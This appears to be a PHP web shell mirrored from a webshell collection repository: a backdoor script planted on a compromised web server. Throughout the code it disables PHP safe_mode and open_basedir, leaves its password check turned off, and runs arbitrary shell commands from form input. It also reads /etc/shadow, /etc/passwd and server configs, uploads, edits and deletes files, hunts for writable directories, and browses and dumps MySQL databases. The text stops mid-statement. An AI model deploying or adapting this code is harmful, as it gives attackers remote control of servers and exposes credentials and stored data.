mirror of
https://github.com/tennc/webshell
synced 2024-11-26 21:20:18 +00:00
644 lines
26 KiB
Text
644 lines
26 KiB
Text
<?php
|
|
|
|
## ## #
|
|
## # ####
|
|
## ## ## ##
|
|
### ### ## #
|
|
### ## ## ##
|
|
## ### ## ##
|
|
# # ##
|
|
### # ##
|
|
### # ## ##
|
|
# ## ## ##
|
|
# #####
|
|
# ## ###
|
|
## ### #
|
|
#######
|
|
#####
|
|
|
|
//error_reporting(0);
|
|
@ini_restore("safe_mode");
|
|
@ini_restore("open_basedir");
|
|
if(get_magic_quotes_gpc()){
|
|
while(list($key,$val)=each($_POST)){
|
|
$_POST[$key]=stripslashes($val);}}
|
|
set_magic_quotes_runtime(0);
|
|
@set_time_limit(0);
|
|
@ini_set('max_execution_time',0);
|
|
@ini_set('output_buffering',0);
|
|
$name='1';
|
|
$pass='c8d3a760ebab631565f8509d84b3b3f1';
|
|
if(false){#esli nado pishem 'true'
|
|
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
|
|
header('WWW-Authenticate: Basic realm="Auth"');header('HTTP/1.0 401 Unauthorized');
|
|
exit;}}
|
|
header("Cache-Control: no-store, no-cache, must-revalidate");
|
|
header("Cache-Control: post-check=0, pre-check=0", false);
|
|
header("Pragma: no-cache");
|
|
function font($color,$text,$size=4){return("<font color=$color size=$size >$text</font>");}
|
|
function w($a){return str_repeat(" ",$a);}
|
|
function b($b){return "<b>$b</b>";}
|
|
function e($e){switch($e){
|
|
case 0:return('no such file');
|
|
case 1:return('no such dirictory');
|
|
case 2:return('permission denied');
|
|
case 3:return('is not dirictory');
|
|
case 4:return('is a dirictory');
|
|
}}
|
|
function test_file($filename){
|
|
return(file_exists($filename)?(is_readable($filename)?false:font('red',e(2))):font('red',e(0)));}
|
|
if(isset($_POST['downl']) && !empty($_POST['downf'])){
|
|
if(!preg_match('/^\//',$_POST['downf'])){
|
|
$_POST['downf']=$_POST['th'].'/'.$_POST['downf'];}
|
|
if(!test_file($_POST['downf'])){
|
|
if(!is_dir($_POST['downf'])){
|
|
$fd=fopen($_POST['downf'], "rb");
|
|
$nam=preg_replace('/.+\//','',$_POST['downf']);
|
|
header("Content-Type: application/octet-stream; name=\"".$nam."\"");
|
|
header("Content-Length: ".filesize($_POST['downf']));
|
|
header("Content-disposition: attachment; filename=\"".$nam."\"");
|
|
while(!feof($fd)){
|
|
$buffer=fgets($fd,4096);
|
|
echo $buffer;
|
|
}
|
|
fclose ($fd);
|
|
exit;
|
|
}
|
|
else $error=font('red',e(4));
|
|
}
|
|
else $error=test_file($_POST['downf']);}
|
|
if(isset($_POST['sql']) && !isset($_POST['exitsql'])){
|
|
$text="<body bgcolor=#C2DDFF>
|
|
<b>Mysql@server:user:pass:db</b>
|
|
<form method='POST'>
|
|
";
|
|
$a=array('server','user','password','db');$i=-1;
|
|
while($i++<3){
|
|
$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:'')."'>\n";}
|
|
$text.="<input type='submit' name='sql' value='Connect'>
|
|
<input type='submit' name='exitsql' value='Exit'>";
|
|
$text="\n<body bgcolor=#C2DDFF>
|
|
<b>Mysql@server:user:pass:db</b>
|
|
<form method='POST'>\n";
|
|
$a=array('srv','user','pass','db');$i=-1;
|
|
while($i++<3){
|
|
$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:(($i==0)?'localhost':null))."'>\n";}
|
|
$text.="<input type='submit' name='sql' value='Connect'><input type='submit' name='exitsql' value='Exit'>\n";
|
|
if(isset($_POST['sql'])){
|
|
if(isset($_POST['user']))$user=$_POST['user'];
|
|
if(isset($_POST['pass']))$password=$_POST['pass'];
|
|
if(isset($_POST['srv'])){
|
|
$server=$_POST['srv'];
|
|
$connect=mysql_connect($server,$user,$password) or die($text."</form>not connect");}
|
|
else{die($text."</form>");}
|
|
if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db<br>");}
|
|
function write($data){
|
|
switch($_POST['save']){
|
|
case 0:
|
|
global $dump;
|
|
$dump.=$data;
|
|
break;
|
|
case 1:
|
|
global $fp;
|
|
switch($_POST['compr']){
|
|
case 0:
|
|
fwrite($fp,$data);
|
|
break;
|
|
case 1:
|
|
gzwrite($fp, $data);
|
|
break;
|
|
case 2:
|
|
bzwrite($fp,$data);
|
|
break;}
|
|
break;}}
|
|
function sqlh(){
|
|
global $dump,$server;
|
|
write("#\n#Server : ".getenv('SERVER_NAME')."
|
|
#DB_Host : ".$server."
|
|
#DB : ".$_POST['db']."
|
|
#Table : ".$_POST['table_sel']."\n#\n\n");}
|
|
function sql(){
|
|
global $dump,$connect;
|
|
$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `".$_POST['table_sel']."`",$connect));
|
|
write("DROP TABLE IF EXISTS `".$_POST['table_sel']."`;\n".$row[1].";\n\n");}
|
|
function sql1(){
|
|
global $connect;
|
|
$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
|
|
function test($aaa){
|
|
$d=array();
|
|
while (list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
|
|
return($d);}
|
|
while ($line=mysql_fetch_assoc($result)) {
|
|
((!isset($key))?($key=implode('`, `',array_keys($line))):null);
|
|
$ddd=test(array_values($line));
|
|
$val=implode('\', \'',$ddd);
|
|
write("INSERT INTO `".$_POST['table_sel']."`(`".$key."`) VALUES ('".$val."');\n");}
|
|
mysql_free_result($result);}
|
|
function head($tmpfname,$name){
|
|
header("Content-Type: application/octet-stream; name=\"$name\"");
|
|
header("Content-Length: ".filesize($tmpfname)."");
|
|
header("Content-disposition: attachment; filename=\"$name\"");
|
|
$fd=fopen($tmpfname, "r");
|
|
while(!feof($fd)){
|
|
echo fgets($fd, 4096);}
|
|
fclose($fd);
|
|
unlink($tmpfname);
|
|
exit;}
|
|
if(isset($_POST['back']) && isset($_POST['table_sel'])){
|
|
$dump='';
|
|
if($_POST['save']==1){
|
|
$tmpfname=tempnam($_POST['save_p'], "FOO");
|
|
switch($_POST['compr']){
|
|
case 0:
|
|
$fp=fopen($tmpfname,"w");
|
|
break;
|
|
case 1:
|
|
$fp=gzopen($tmpfname, "w9");
|
|
break;
|
|
case 2:
|
|
$fp=bzopen($tmpfname, "w");
|
|
break;}}
|
|
switch($_POST['as']){
|
|
case 0:
|
|
switch($_POST['as_sql']){
|
|
case 0:
|
|
sqlh();
|
|
sql();
|
|
break;
|
|
case 1:
|
|
sqlh();
|
|
sql();
|
|
sql1();
|
|
break;
|
|
case 2:
|
|
sqlh();
|
|
sql1();
|
|
break;}
|
|
if($_POST['save']==1){
|
|
switch($_POST['compr']){
|
|
case 0:
|
|
$n='.txt';
|
|
fclose($fp);
|
|
break;
|
|
case 1:
|
|
$n='.gz';
|
|
gzclose($fp);
|
|
break;
|
|
case 2:
|
|
$n='.bz2';
|
|
bzclose($fp);
|
|
break;}
|
|
head($tmpfname,$_POST['table_sel'].$n);}
|
|
break;
|
|
case 1:
|
|
$res=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
|
|
if(mysql_num_rows($res) > 0) {
|
|
while($row = mysql_fetch_assoc($res)) {
|
|
$values = array_values($row);
|
|
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
|
$values = implode($_POST['cvs_term'], $values);
|
|
write($values);}}
|
|
break;}}
|
|
echo "$text\n<table height=200 width=100%><tr><td bgcolor=green width=10%>";
|
|
$db_list=mysql_list_dbs($connect);
|
|
echo "<select name='db' multiple size=30>\n";
|
|
while($row=mysql_fetch_object($db_list)){
|
|
$db1=$row->Database;
|
|
echo "<option value='$db1' ".(($db1===$_POST['db'])?'selected':'').">$db1</option>\n";}
|
|
echo "</select></td><td bgcolor=#CBC3B6>\n";
|
|
if(!empty($_POST['db'])){
|
|
$tb_list=mysql_list_tables($_POST['db']);
|
|
echo "<select name='table_sel' multiple size=30>";
|
|
for($i=0;$i<mysql_num_rows($tb_list);$i++){
|
|
$n=mysql_fetch_array(mysql_query('select count(*) from '.mysql_tablename($tb_list,$i)));
|
|
echo "<option value='".mysql_tablename($tb_list, $i)."'".($tr=((isset($_POST['table_sel']) && $_POST['table_sel']===mysql_tablename($tb_list, $i))?'selected':'')).">".mysql_tablename($tb_list, $i).'('.$n[0].")</option>";}
|
|
echo "</select></td><td width=100%>
|
|
<table width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr>\n";
|
|
if(isset($_POST['table_sel'])){
|
|
$c=array('Browse','SQL','Insert','Export');$i=-1;
|
|
while($i++<3){echo "<input type=radio Name='go' value='".($i)."'>".$c[$i];}}
|
|
echo " <b>".((isset($_POST['table_sel']))?$_POST['table_sel']:null)."</b></nobr></td></tr><tr width=100%><td width=100%>\n";}
|
|
if(isset($_POST['push']) && isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']))$_POST['go']=0;
|
|
elseif(isset($_POST['push']))$_POST['go']=1;
|
|
if(isset($_POST['back']))$_POST['go']=3;
|
|
if(isset($_POST['brow']))$_POST['go']=0;
|
|
if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=4;
|
|
if(isset($_POST['ed_save']))$_POST['go']=5;
|
|
if(isset($_POST['editr']) && !isset($_POST['edit']))$_POST['go']=0;
|
|
if(isset($_POST['go'])){switch($_POST['go']){
|
|
case 0:
|
|
if(isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']) && isset($_POST['push'])){
|
|
$n=mysql_fetch_array(mysql_query(preg_replace('/^\s*select\s+.+\s+from\s+/i','select count(*) from',$_POST['querysql'])));
|
|
$result=mysql_query($_POST['querysql'],$connect);}
|
|
else{$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel']));$sort='';
|
|
if(!empty($_POST['sort']))$sort='ORDER BY `'.trim($_POST['sort']).'` ASC ';$co='0,20';
|
|
if(isset($_POST['br_st']) && isset($_POST['br_en'])){
|
|
$co=$_POST['br_en'].','.$_POST['br_st'];}
|
|
$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` $sort limit $co",$connect);}
|
|
for($i=0;$i<mysql_num_fields($result);$i++){
|
|
if(ereg('primary_key',mysql_field_flags($result, $i)))
|
|
$prim=mysql_field_name($result, $i);}
|
|
$up_e='';
|
|
echo "<div style='width:100%;height:450px;overflow:auto;'><table border=1>\n";
|
|
while($line=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr bgcolor='#C1D2C5'>\n";
|
|
if(!isset($lk)){
|
|
echo "<td><b>EDIT</b></td>";
|
|
foreach(array_keys($line) as $lk){print((isset($prim) && $lk===$prim)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");}}
|
|
if(!isset($prim)){
|
|
while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
|
|
$up_e=substr($up_e,0,-5);}
|
|
else{while(list($key,$val)=each($line)){
|
|
if($key===$prim){$up_e.="`$key`='".addslashes($val)."'";}}}
|
|
$up_e=urlencode($up_e);
|
|
echo "</tr><tr><td><input type=radio name=edit value='$up_e'></td>\n";
|
|
$up_e='';
|
|
foreach($line as $col_value){echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";}
|
|
echo "</tr>\n";}
|
|
echo "</table></div><input type=submit name='brow' value='Browse'><b>Sort by
|
|
<input type=text name=sort size=10 value='".((isset($_POST['sort']))?$_POST['sort']:'')."'>
|
|
Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) starting from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
|
|
<input type=submit name=editr value=Edit>";
|
|
mysql_free_result($result);
|
|
break;
|
|
case 1:
|
|
echo "<input type=submit name=push value=Run><br>
|
|
<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((isset($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
|
|
if(!empty($_POST['querysql'])){
|
|
$result = mysql_query($_POST['querysql'],$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
|
|
echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";}
|
|
break;
|
|
case 2:
|
|
echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";
|
|
$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
|
|
for($i=0;$i<mysql_num_fields($fields);$i++){
|
|
echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields, $i).'('.mysql_field_len($fields, $i).")</b></td><td>".((mysql_field_len($fields, $i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
|
|
echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
|
|
break;
|
|
case 3:
|
|
if(!isset($_POST['back']))echo '<table height=250 align="center"><TR><TD>
|
|
<table height=100%>
|
|
<tr><td bgcolor="#A8B8F1" width="100" height="20"><b> Export as</b></td></tr>
|
|
<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b> SQL</b></td></tr>
|
|
<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b> CSV</b></td></tr>
|
|
<tr><td height=100%></td></tr>
|
|
</table></TD><td>
|
|
<table width="140" height=100%>
|
|
<TR><TD bgcolor="#A8B8F1" height="20"><b> SQL</b></TD></TR>
|
|
<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="0" ><b>Only structure</b></TD></TR>
|
|
<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
|
|
<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
|
|
<TR><TD bgcolor="#A8B8F1" height="20"><b>CSV</b></TD></TR>
|
|
<TR><TD bgcolor="#D0E0FF" height="20"><b>Terminated </b><input size=2 type=text Name="cvs_term" value=":"></TD></TR>
|
|
<tr><td height=100%></tb></tr>
|
|
</table>
|
|
</td><td>
|
|
<table height=100%>
|
|
<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b> View</b></td></tr>
|
|
<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b> Download</b></td></tr>
|
|
<tr><td bgcolor="#E6D29C" width="130" height="40"><b> Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
|
|
<tr><td height=100%></td></tr>
|
|
</table></td><td>
|
|
<table width="120" height=100%>
|
|
<TR><TD bgcolor="#A8B8F1" height="20"><b> Compression</b></TD></TR>
|
|
<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR>'.
|
|
((@function_exists('gzencode'))?'<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="1" ><b>Gzip</b></TD></TR>':'').
|
|
((@function_exists('bzcompress'))?'<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="2"><b>Bzip</b></TD></TR>
|
|
<tr><td height=100%></td></tr>':'').'</table></td></TR>
|
|
<tr><td><input type=submit value=backup name=back></td></tr>
|
|
</table>';
|
|
if(isset($_POST['back']) && isset($_POST['table_sel'])){
|
|
if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump)."</textarea>";}}
|
|
break;
|
|
case 4:
|
|
if(isset($_POST['edit'])){
|
|
$up_e=$_POST['edit'];
|
|
echo "<input type=hidden name=edit value='$up_e'>";
|
|
$up_e=urldecode($_POST['edit']);
|
|
echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";$fi=0;
|
|
$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
|
|
while($line=mysql_fetch_array($result,MYSQL_ASSOC)){
|
|
foreach($line as $key=>$col_value) {
|
|
echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
|
|
$fi++;}}
|
|
echo "</table></div><input type=submit name=ed_save value=Save>";}
|
|
break;
|
|
case 5:
|
|
$ted='';
|
|
$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :)
|
|
while(list($key1,$val1)=each($_POST2)){
|
|
if(preg_match('/ed_key:(.+)/',$key1,$m))
|
|
{$ted.="`".$m[1]."`= '".addslashes($val1)."', ";}}
|
|
$ted=substr($ted,0,-2);
|
|
$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
|
|
echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
|
|
$result = mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
|
|
echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
|
|
break;}}
|
|
echo "</td></tr></table></td></tr></table><input type=hidden name=sql>\n";}
|
|
else echo $text;
|
|
echo "</form></body>";exit;}
|
|
echo "<html><body bgcolor=white><center><table bgcolor=orange height=10 border=1><tr><td><nobr>".font('blue',@php_uname())."</nobr></td></tr></table><table bgcolor=orange height=10 border=1><tr><nobr><td>".font('blue','PHP:'.@phpversion())."</nobr></td><td><nobr>".font('blue',date('H:i:s l d F Y'))."</nobr></td><td><nobr>".font('blue',getenv('SERVER_ADDR'))."</nobr></td><td><nobr>".font('blue',getenv('REMOTE_ADDR'))."</nobr></td></tr></table><br></center>\n";
|
|
if(!test_file('/etc/shadow'))echo font('red',b('shadow readable<br>'));
|
|
if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable<br>'));
|
|
if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable<br>'));
|
|
if(!empty($_POST['th']))@chdir($_POST['th']);
|
|
echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE"));
|
|
#UP
|
|
if(isset($_POST['up']))@chdir('../');
|
|
#CD
|
|
if(isset($_POST['c']) && $_POST['cd']!=''){
|
|
if(!test_file($_POST['cd'])){
|
|
if(is_dir($_POST['cd'])){
|
|
@chdir($_POST['cd']);
|
|
}
|
|
else $error=font('red',e(3));
|
|
}
|
|
else $error=test_file($_POST['cd']);}
|
|
echo w(3)."<input type=text size=60 value=".getcwd().">";
|
|
echo font('blue','USER : '.get_current_user());
|
|
if(file_exists("/"))
|
|
echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ'));
|
|
if(file_exists("C:/"))
|
|
echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ'));
|
|
if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE');
|
|
echo "<br>";
|
|
?>
|
|
<hr>
|
|
<form method=POST name=main>
|
|
<input type="submit" value="^" name="up">
|
|
<input type=text name=cd>
|
|
<input type=submit value=cd name=c>
|
|
<input type=text name=open>
|
|
<input type=submit value=open name=op>
|
|
<input type=text name=new>
|
|
<input type=submit name=cr value="new file">
|
|
<input type=text name=exec>
|
|
<input type=submit name=exe value=exec>
|
|
<input type=submit name=info value=phpinfo>
|
|
<br>
|
|
<?php
|
|
$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/etc/hosts','/proc/version','/proc/cpuinfo','/proc/meminfo','/etc/httpd/conf/httpd.conf','/usr/local/apache/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/etc/syslog.conf');
|
|
echo '<select name=passwd>';
|
|
foreach($ar_file as $ar_l){
|
|
if(!test_file($ar_l))echo "<option value='$ar_l'>$ar_l</option>\n";}
|
|
echo '</select><input type=submit name=passw value="read file">';
|
|
?>
|
|
<input type=submit name=menu value=upload>
|
|
<input type=text name=downf>
|
|
<input type=submit name=downl value=download>
|
|
<input type=text name="test">
|
|
<input type=submit name=tes value="perms">
|
|
<input type="submit" name="sql" value="mysql">
|
|
<input type="submit" name="eval" value="eval">
|
|
<br>
|
|
<input type=text name=strin>
|
|
<input type=text name=remot>
|
|
<input type=submit name=copy value=copy>
|
|
<input type="text" name="renold" >
|
|
<input type="text" name="rennew" >
|
|
<input type="submit" name="rename" value="rename">
|
|
<input type=text name=rm >
|
|
<input type=submit name=del value=del>
|
|
<br>
|
|
<input type=reset value=RESET>
|
|
<input type="text" name="mkdir">
|
|
<input type="submit" name="mk" value="mkdir">
|
|
<input type="text" name="rmdir">
|
|
<input type="submit" name="rmd" value="rmdir">
|
|
<input type="text" name="ch_mod">
|
|
<?php
|
|
for($bch=1;$bch<=3;$bch++){echo"<select name=ch_p$bch>\n";
|
|
for($ach=7;$ach>=0;$ach--){echo"<OPTION value=$ach>$ach</OPTION>";}
|
|
echo"</select>";}
|
|
?>
|
|
<input type="submit" name="ch_chmod" value="chmod">
|
|
<input type=submit name=find value='find writeable'>
|
|
<br>
|
|
<hr>
|
|
<?php
|
|
#FIND WRITEABLE##############
|
|
if(isset($_POST['find'])){
|
|
echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" checked>Only writeable:<input type=checkbox name="onw" checked><input type=submit name=fww value="Find it">');}
|
|
if(isset($_POST['fww']) && !empty($_POST['fpath'])){
|
|
echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" '.(isset($_POST['dy'])?'checked':null).'>Only writeable:<input type=checkbox name="onw" '.(isset($_POST['onw'])?'checked':null).'><input type=submit name=fww value="Find it"><hr>');
|
|
$arrfw=array($_POST['fpath']);
|
|
$ife=0;
|
|
while(++$ife<=count($arrfw)){
|
|
$pathfw=$arrfw[$ife-1];
|
|
if(is_readable($pathfw)){
|
|
if($hfw=opendir($pathfw)){
|
|
while(false!==($ffw=readdir($hfw))){
|
|
$ffw=$pathfw.$ffw;
|
|
if(!preg_match('/\/\.+$/',$ffw)){
|
|
if(is_dir($ffw)){array_push($arrfw,$ffw.'/');}
|
|
print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/<br>",3) :(isset($_POST['onw'])?null:"$ffw/<br>")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw<br> ",3):(isset($_POST['onw'])?null:"$ffw<br>")):null));}}
|
|
closedir($hfw);}}}}
|
|
|
|
|
|
if(isset($_POST['eval'])){
|
|
echo "<textarea cols=70 rows=7 name='ev'></textarea>\n";
|
|
|
|
|
|
|
|
|
|
|
|
echo "";
|
|
}
|
|
############################################################################
|
|
#RENAME
|
|
if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){
|
|
if(file_exists($_POST['renold'])){
|
|
@rename($_POST['renold'],$_POST['rennew']);
|
|
}
|
|
else $error=font('red',e(0));
|
|
}
|
|
#
|
|
|
|
#RMDIR
|
|
if(isset($_POST['rmd']) && isset($_POST['rmdir'])){
|
|
if(file_exists($_POST['rmdir'])){
|
|
if(is_dir($_POST['rmdir'])){
|
|
if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet");
|
|
else $error=font('red','dir not deleted');
|
|
}
|
|
else $error=font('red',e(3));
|
|
}
|
|
else $error=font('red',e(0));
|
|
}
|
|
#
|
|
#CHMOD
|
|
if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){
|
|
if(file_exists($_POST['ch_mod'])){
|
|
@chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));}
|
|
else $error=font('red',e(0));}
|
|
#
|
|
#DELETE
|
|
if(isset($_POST['del']) && $_POST['rm']!=''){
|
|
if(file_exists($_POST['rm'])){
|
|
if(!is_dir($_POST['rm'])){
|
|
@unlink($_POST['rm']);
|
|
}
|
|
else echo "<br>".font('red',e(4)."<br>");
|
|
}
|
|
else echo "<br>".font('red',e(0)."<br>");
|
|
}
|
|
#
|
|
#EXEC
|
|
if(!empty($_POST['exe'])){
|
|
if(@exec($_POST['exec'],$ar)){
|
|
echo "<textarea cols=70 rows=15>";
|
|
foreach($ar as $line){
|
|
echo $line."\n";
|
|
}
|
|
echo "</textarea>";}}
|
|
#
|
|
#OPEN FILE
|
|
if(isset($_POST['op']) && $_POST['open']!=''){
|
|
if(!test_file($_POST['open'])){
|
|
if(!is_dir($_POST['open'])){
|
|
$fil=file($_POST['open']);
|
|
echo "<textarea cols=100 rows=20 name=edit>";
|
|
foreach($fil as $vv){
|
|
echo htmlspecialchars($vv);
|
|
}
|
|
echo "</textarea><br>".font('green',"FILE : ".$_POST['open'],3);
|
|
if(is_writable($_POST['open'])==1){
|
|
echo w(2).font('green','ACCESS GRANTED');
|
|
echo "<input type=submit name=save value=save><input type=hidden value=".$_POST['open']." name=sv>";
|
|
}}
|
|
else $error=font('red',e(2));
|
|
}
|
|
else $error=test_file($_POST['open']);
|
|
}
|
|
if(isset($_POST['save'])){
|
|
$fr=fopen($_POST['sv'],"w");
|
|
$out=$_POST['edit'];
|
|
fputs($fr,$out);
|
|
fclose($fr);
|
|
}
|
|
#
|
|
#CREATE FILE
|
|
if(isset($_POST['cr']) && $_POST['new']!=''){
|
|
if(is_writable(dirname($_POST['new']))){
|
|
echo font('green',"Create new file : ".$_POST['new'],3)."<br><textarea name=newf cols=100 rows=20></textarea>
|
|
<input type=submit name=cre value=create>
|
|
<input type=hidden value=".$_POST['new']." name=nf>";
|
|
}
|
|
else echo "<br>".font('red',e(2)."<br>");
|
|
}
|
|
if(isset($_POST['cre'])){
|
|
$ee=fopen($_POST['nf'],'w+');
|
|
$out=$_POST['newf'];
|
|
fputs($ee,$out);
|
|
fclose($ee);
|
|
}
|
|
#
|
|
#MKDIR
|
|
if(isset($_POST['mk']) && $_POST['mkdir']!=''){
|
|
if(is_writeable('./')){
|
|
@mkdir($_POST['mkdir']);
|
|
echo font('green',"dir ".b($_POST['mkdir'])." create");
|
|
}
|
|
else echo font('red',e(2));
|
|
}
|
|
#
|
|
echo "<input type=hidden name=th value=".getcwd()."></form>";
|
|
#UPLOAD FILE
|
|
if(isset($_POST['menu']) || isset($_POST['qq'])){
|
|
echo "
|
|
<form enctype=multipart/form-data method=post>
|
|
Save as :<input type=text name=name>File :<input name=userfile type=file>
|
|
<input type=submit value=Send name=go_up>
|
|
<input type=hidden name=qq>
|
|
<input type=hidden name=th value=".getcwd()."></form>";
|
|
if(isset($_POST['go_up'])){
|
|
if(isset($_POST['name']) && $_POST['name']==''){
|
|
$_POST['name']=$_FILES['userfile']['name'];}
|
|
if(!preg_match('/^\//',$_POST['name'])){
|
|
$_POST['name']=$_POST['th'].'/'.$_POST['name'];}
|
|
if(is_uploaded_file($_FILES['userfile']['tmp_name'])){
|
|
@copy($_FILES['userfile']['tmp_name'],$_POST['name']);}
|
|
else echo "<br>".font('red',"Permisions denied");}}
|
|
#
|
|
#TEST PERM
|
|
if(isset($_POST['tes']) && $_POST['test']!=''){
|
|
$j=$_POST['test'];
|
|
if(file_exists($j)){
|
|
$w='';
|
|
if(is_writeable($j)){
|
|
$w=w(1).'WRITE'.w(1);
|
|
}
|
|
if(is_readable($j)){
|
|
$w=$w.w(1).'READ'.w(1);
|
|
}
|
|
echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777));
|
|
}
|
|
else echo font('red',$e(0));
|
|
}
|
|
#
|
|
#COPY
|
|
if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){
|
|
if(file_exists(dirname($_POST['remot']))){
|
|
if(file_exists($_POST['strin'])){
|
|
if(is_writable(dirname($_POST['remot']))){
|
|
if(is_readable($_POST['strin'])){
|
|
@copy($_POST['strin'],$_POST['remot']);
|
|
}
|
|
else echo font('red',"no read string file");
|
|
}
|
|
else echo font('red',"no write dest directory");
|
|
}
|
|
else echo font('red',"no such file");
|
|
}
|
|
else echo font('red',"no such dest dir");
|
|
}
|
|
#
|
|
#CHECK DISK
|
|
if(isset($_POST['free']) && $_POST['dirfree']!=''){
|
|
if(file_exists($_POST['dirfree'])){
|
|
$fre=@disk_free_space($_POST['dirfree'])/1048576;
|
|
echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb");
|
|
$fre1=@disk_total_space($_POST['dirfree'])/1048576;
|
|
echo "<br>".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb");
|
|
}
|
|
else echo font('red',"No such disk");
|
|
}
|
|
#
|
|
(isset($_POST['info']))?phpinfo():null;
|
|
#
|
|
#PASSWD
|
|
if(!empty($_POST['passwd']) && isset($_POST['passw'])){
|
|
echo "<center>".font('blue',"file : ".$_POST['passwd'],6)."</center><br><textarea cols=100 rows=15>\n";
|
|
foreach(@file($_POST['passwd']) as $fed)echo $fed;
